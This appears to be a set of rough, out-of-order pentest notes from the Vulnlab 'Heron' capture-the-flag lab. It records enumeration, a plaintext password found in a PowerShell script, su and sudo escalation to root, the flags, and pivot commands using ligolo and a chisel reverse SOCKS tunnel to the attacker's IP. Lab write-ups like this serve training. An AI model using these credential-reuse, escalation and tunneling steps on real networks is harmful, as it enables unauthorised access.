C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
mucdc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 5AA1-68C9
Directory of C:\Users\Administrator\Desktop
06/06/2024 07:24 AM <DIR> .
06/06/2024 07:30 AM <DIR> ..
05/26/2024 03:16 AM 2,308 Microsoft Edge.lnk
05/26/2024 04:30 AM 1,369 plink.lnk
06/02/2024 03:45 AM 36 root.txt
3 File(s) 3,713 bytes
2 Dir(s) 4,903,018,496 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
464/tcp open kpasswd
593/tcp open unknown
636/tcp open ldaps
3389/tcp open ms-wbt-server
frajmp.heron.vl:10.10.255.102
Nmap scan report for 10.10.255.102
Host is up, received user-set (0.11s latency).
Scanned at 2024-10-26 12:04:10 EDT for 27s
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 10a0bd2a813d375d2375c8d283bf2a23 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIVPUPzGA2ERjiZJk6cW/S1+nDZvJbjSLwjGgTU8RETSfBV9pgYbUDrmu28cmDSCKQ0cirkaf3dggjVtJ
O/EvYM=
| 256 bd3229264d41d7560137bc100cde4524 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFkNc5lDxvCLp4GsbGLiAmmFudhK+TXxP978Cp6Y+z4b
https://wiki.vulnlab.com/guidance/medium/heron-chain
pentest:Heron123!
No sudo -l.
No /opt.
No gcc.
No hidden ports other than tcp/22.
pentest@frajmp:~$ netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 10.10.255.102:68 0.0.0.0:* -
pentest@frajmp:~$ ls -lah /home
total 24K
drwxr-xr-x 6 root root 4.0K Jun 6 14:18 .
drwxr-xr-x 19 root root 4.0K May 25 17:05 ..
drwxr-x--- 4 _local _local 4.0K May 26 09:31 _local
drwxr-x--- 4 pentest pentest 4.0K Jun 4 16:04 pentest
drwx------ 4 svc-web-accounting-d@heron.vl domain users@heron.vl 4.0K Jun 6 15:04 svc-web-accounting-d@heron.vl
drwx------ 3 svc-web-accounting@heron.vl domain users@heron.vl 4.0K Jun 6 15:04 svc-web-accounting@heron.vl
pentest@frajmp:~$ cat /etc/krb5.conf
[libdefaults]
udp_preference_limit = 0
default_realm = HERON.VL
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 72h
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
[realms]
HERON.VL = {
kdc = mucdc.heron.vl
admin_server = mucdc.heron.vl
}
[domain_realm]
.heron.vl = HERON.VL
heron.vl = HERON.VL
#From PRIV ESC of mucdc:
PS C:\Windows\Scripts> dir
dir
Directory: C:\Windows\Scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/6/2024 7:12 AM 1416 dns.ps1
-a---- 6/1/2024 8:26 AM 221 ssh.ps1 - Very Interested file.
PS C:\Windows\Scripts> type ssh.ps1
type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "Deplete5DenialDealt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
Found _local credential for frajmp !
_local:Deplete5DenialDealt
pentest@frajmp:/tmp$ su - _local
Password:
_local@frajmp:~$ sudo -l
[sudo] password for _local:
Matching Defaults entries for _local on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User _local may run the following commands on localhost:
(ALL : ALL) ALL
_local@frajmp:~$ sudo su
root@frajmp:/home/_local# whoami
root
root@frajmp:/home/_local# id
uid=0(root) gid=0(root) groups=0(root)
root@frajmp:/home/_local# hostname
frajmp.heron.vl
ROOT-SHELL !
root@frajmp:~# whoami
root
root@frajmp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@frajmp:~# pwd
/root
root@frajmp:~# ls
flag.txt snap
root@frajmp:~# cat flag.txt
VL{5112c412c73712e84fc3d01a30298760}
ROOT FLAG: VL{5112c412c73712e84fc3d01a30298760}
./proxy -selfcert -laddr 0.0.0.0:53
./agent -connect 10.8.0.71:53 -ignore-cert &
sudo ip route add 10.10.216.0/24 dev ligolo
#Ligolo-ng will not work this time.
#Firewall prevents nmap unfortunately.
chisel SOCKS5 proxy:
./chisel server -p 9998 --reverse
./chisel.exe client --max-retry-count=1 10.10.14.126:9998 R:1080:socks
# Make sure use it with foxyproxy (socks5) and proxychains4.conf:
socks5 127.0.0.1 1080
sshuttle -r pentest@10.10.255.102 10.10.255.0/24 - WORKS !